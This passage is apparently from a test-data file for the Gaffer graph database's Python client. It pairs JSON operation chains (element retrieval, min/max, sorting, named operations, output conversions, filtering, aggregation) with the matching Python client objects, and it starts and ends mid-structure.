"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "score",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
view=g.View(
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
selection=[
"DESTINATION",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
),
projection=[
"score"
]
)
],
group="edge",
transient_properties={
'score': 'java.lang.Integer'}
)
],
entities=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
selection=[
"VERTEX",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
),
projection=[
"score"
]
)
],
group="entity",
transient_properties={
'score': 'java.lang.Integer'}
)
]
)
),
g.Max(
comparators=[
g.ElementPropertyComparator(
reversed=False,
groups=[
"entity",
"edge"
],
property="count"
),
g.ElementPropertyComparator(
reversed=False,
groups=[
"entity",
"edge"
],
property="score"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Min",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Min(
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "DESTINATION", "count" ],
"projection" : [ "score" ]
} ]
}
},
"entities" : {
"entity" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "VERTEX", "count" ],
"projection" : [ "score" ]
} ]
}
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Min",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
}, {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "score",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
view=g.View(
entities=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
function=g.Function(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
),
selection=[
"VERTEX",
"count"
],
projection=[
"score"
]
)
],
transient_properties={
'score': 'java.lang.Integer'},
group="entity"
)
],
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
function=g.Function(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
),
selection=[
"DESTINATION",
"count"
],
projection=[
"score"
]
)
],
transient_properties={
'score': 'java.lang.Integer'},
group="edge"
)
]
)
),
g.Min(
comparators=[
g.ElementPropertyComparator(
groups=[
"entity",
"edge"
],
property="count",
reversed=False
),
g.ElementPropertyComparator(
groups=[
"entity",
"edge"
],
property="score",
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop",
"description" : "2 hop query",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"labels": ["label_1", "label_2"],
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
} ]
}
}
''',
g.AddNamedOperation(
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
)
]
),
overwrite_flag=True,
write_access_roles=[
"write-user"
],
description="2 hop query",
read_access_roles=[
"read-user"
],
operation_name="2-hop",
labels = ["label_1", "label_2"]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop-with-score",
"description" : "2 hop query",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"score" : 3,
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
} ]
}
}
''',
g.AddNamedOperation(
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
)
]
),
overwrite_flag=True,
write_access_roles=[
"write-user"
],
description="2 hop query",
read_access_roles=[
"read-user"
],
score=3,
operation_name="2-hop-with-score"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop-with-limit",
"description" : "2 hop query with settable limit",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"parameters" : {
"param1" : {
"description" : "Limit param",
"defaultValue" : 1,
"valueClass" : "java.lang.Long",
"required" : false
}
},
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : "${param1}"
} ]
}
}
''',
g.AddNamedOperation(
description="2 hop query with settable limit",
parameters=[
g.NamedOperationParameter(
value_class="java.lang.Long",
description="Limit param",
required=False,
default_value=1,
name="param1"
)
],
operation_name="2-hop-with-limit",
overwrite_flag=True,
read_access_roles=[
"read-user"
],
write_access_roles=[
"write-user"
],
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.Limit(
result_limit="${param1}"
)
]
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.AddNamedOperation",
"operationName" : "2-hop-with-limit",
"description" : "2 hop query with settable limit",
"readAccessRoles" : [ "read-user" ],
"writeAccessRoles" : [ "write-user" ],
"overwriteFlag" : true,
"parameters" : {
"param1" : {
"description" : "Limit param",
"defaultValue" : 1,
"valueClass" : "java.lang.Long",
"required" : false
}
},
"operationChain" : {
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : "${param1}"
} ]
}
}
''',
g.AddNamedOperation(
read_access_roles=[
"read-user"
],
operation_chain=g.OperationChainDAO(
operations=[
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.GetAdjacentIds(
include_incoming_out_going="OUTGOING"
),
g.Limit(
result_limit="${param1}"
)
]
),
write_access_roles=[
"write-user"
],
parameters=[
g.NamedOperationParameter(
required=False,
value_class="java.lang.Long",
name="param1",
default_value=1,
description="Limit param"
)
],
operation_name="2-hop-with-limit",
overwrite_flag=True,
description="2 hop query with settable limit"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.GetAllNamedOperations"
}
''',
g.GetAllNamedOperations()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "2-hop",
"input" : [ {
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.NamedOperation(
operation_name="2-hop",
input=[
g.EntitySeed(
vertex=1
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "2-hop-with-limit",
"parameters" : {
"param1" : 2
},
"input" : [ {
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.NamedOperation(
parameters={'param1': 2},
input=[
g.EntitySeed(
vertex=1
)
],
operation_name="2-hop-with-limit"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.operation.DeleteNamedOperation",
"operationName" : "2-hop"
}
''',
g.DeleteNamedOperation(
operation_name="2-hop"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Sort",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ],
"resultLimit" : 10,
"deduplicate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Sort(
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
)
],
result_limit=10,
deduplicate=True
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Sort",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ],
"resultLimit" : 10,
"deduplicate" : false
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Sort(
result_limit=10,
deduplicate=False,
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "DESTINATION", "count" ],
"projection" : [ "score" ]
} ]
}
},
"entities" : {
"entity" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "VERTEX", "count" ],
"projection" : [ "score" ]
} ]
}
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Sort",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
}, {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "score",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ],
"resultLimit" : 4,
"deduplicate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
view=g.View(
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
projection=[
"score"
],
selection=[
"DESTINATION",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
)
)
],
group="edge",
transient_properties={
'score': 'java.lang.Integer'}
)
],
entities=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
projection=[
"score"
],
selection=[
"VERTEX",
"count"
],
function=g.Function(
class_name="uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction",
fields={}
)
)
],
group="entity",
transient_properties={
'score': 'java.lang.Integer'}
)
]
)
),
g.Sort(
result_limit=4,
comparators=[
g.ElementPropertyComparator(
property="count",
groups=[
"entity",
"edge"
],
reversed=False
),
g.ElementPropertyComparator(
property="score",
groups=[
"entity",
"edge"
],
reversed=False
)
],
deduplicate=True
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToArray"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToArray()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToCsv",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.data.generator.CsvGenerator",
"fields" : {
"GROUP" : "Edge group",
"VERTEX" : "vertex",
"SOURCE" : "source",
"count" : "total count"
},
"quoted" : false
},
"includeHeader" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToCsv(
include_header=True,
element_generator=g.CsvGenerator(
fields={
'GROUP': 'Edge group',
'VERTEX': 'vertex',
'count': 'total count',
'SOURCE': 'source'
},
quoted=False
)
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToEntitySeeds"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToEntitySeeds()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToList"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToList()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToMap",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.data.generator.MapGenerator",
"fields" : {
"GROUP" : "group",
"VERTEX" : "vertex",
"SOURCE" : "source",
"count" : "total count"
}
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToMap(
element_generator=g.MapGenerator(
fields={
'SOURCE': 'source',
'count': 'total count',
'VERTEX': 'vertex',
'GROUP': 'group'
}
)
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToStream"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToStream()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"entity" : { }
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"edgeVertices" : "NONE"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
edges=[
],
entities=[
g.ElementDefinition(
group="entity"
)
]
),
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToVertices(
edge_vertices="NONE"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"edgeVertices" : "DESTINATION"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
),
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
),
g.ToVertices(
edge_vertices="DESTINATION"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"edgeVertices" : "BOTH"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
),
include_incoming_out_going="OUTGOING",
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.ToVertices(
edge_vertices="BOTH"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"useMatchedVertex" : "EQUAL"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
),
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
),
g.ToVertices(
use_matched_vertex="EQUAL"
),
g.ToSet()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults",
"jobId" : "job1"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.function.Filter",
"globalEdges" : {
"predicates" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ "count" ]
} ]
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetJobResults(
job_id="job1"
),
g.Filter(
global_edges=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["count"],
predicate=g.IsMoreThan(
value=2,
or_equal_to=False
)
)
]
)
)
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.function.Filter",
"globalElements": {
"predicates": [
{
"selection": [
"timestamp"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value": 1,
"orEqualTo": true
}
},
{
"selection": [
"timestamp"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"value": 10,
"orEqualTo": true
}
}
]
},
"edges": {
"edge2": {
"predicates": [
{
"selection": [
"prop2"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
},
"edge1": {
"predicates": [
{
"selection": [
"prop2"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
}
},
"globalEntities": {
"predicates": [
{
"selection": [
"timestamp"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value": 1,
"orEqualTo": true
}
}
]
},
"entities": {
"entity1": {
"predicates": [
{
"selection": [
"prop"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
},
"entity2": {
"predicates": [
{
"selection": [
"prop"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.Regex",
"value": "a.*"
}
}
]
}
},
"globalEdges": {
"predicates": [
{
"selection": [
"count"
],
"predicate": {
"class": "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value": 2,
"orEqualTo": false
}
}
]
}
}
''',
g.Filter(
global_edges=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["count"],
predicate=g.IsMoreThan(
value=2,
or_equal_to=False
)
)
]
),
global_entities=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["timestamp"],
predicate=g.IsMoreThan(
value=1,
or_equal_to=True
)
)
]
),
global_elements=g.GlobalElementFilterDefinition(
predicates=[
g.PredicateContext(
selection=["timestamp"],
predicate=g.IsMoreThan(
value=1,
or_equal_to=True
)
),
g.PredicateContext(
selection=["timestamp"],
predicate=g.IsLessThan(
value=10,
or_equal_to=True
)
)
]
),
entities=[
g.ElementFilterDefinition(
group="entity1",
predicates=[
g.PredicateContext(
selection=["prop"],
predicate=g.Regex(
value="a.*"
)
)
]
),
g.ElementFilterDefinition(
group="entity2",
predicates=[
g.PredicateContext(
selection=["prop"],
predicate=g.Regex(
value="a.*"
)
)
]
)
],
edges=[
g.ElementFilterDefinition(
group="edge1",
predicates=[
g.PredicateContext(
selection=["prop2"],
predicate=g.Regex(
value="a.*"
)
)
]
),
g.ElementFilterDefinition(
group="edge2",
predicates=[
g.PredicateContext(
selection=["prop2"],
predicate=g.Regex(
value="a.*"
)
)
]
)
]
)
],
[
'''
{
"operations": [
{
"jobId": "job1",
"class": "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults"
},
{
"edges": {
"edge2": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop2"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
}
},
"edge1": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop2"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
}
}
},
"entities": {
"entity1": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
}
},
"entity2": {
"elementAggregator": {
"operators": [
{
"selection": [
"prop"
],
"binaryOperator": {
"class": "exampleBinaryOperator"
}
}
]
},
"groupBy": [
"timestamp"
]
}
},
"class": "uk.gov.gchq.gaffer.operation.impl.function.Aggregate"
}
],
"class": "uk.gov.gchq.gaffer.operation.OperationChain"
}
''',
g.OperationChain(
operations=[
g.GetJobResults(
job_id="job1"
),
g.Aggregate(
entities=[
g.AggregatePair(
group="entity1",
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
),
g.AggregatePair(
group="entity2",
group_by=[
"timestamp"
],
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
)
],
edges=[
g.AggregatePair(
group="edge1",
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop2"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
),
g.AggregatePair(
group="edge2",
element_aggregator=g.ElementAggregateDefinition(
operators=[
g.BinaryOperatorContext(
selection=["prop2"],
binary_operator=g.BinaryOperator(
class_name="exampleBinaryOperator"
)
)
]
)
)
]
)
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [
{
"class": "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults",
"jobId": "job1"
},
{
"class": "uk.gov.gchq.gaffer.operation.impl.function.Transform",
"edges": {
"edge1": {
"functions": [
{
"selection": [
"prop2"
],
"projection": [
"newProp2"
],
"function": {
"class": "exampleFunction"
}
}
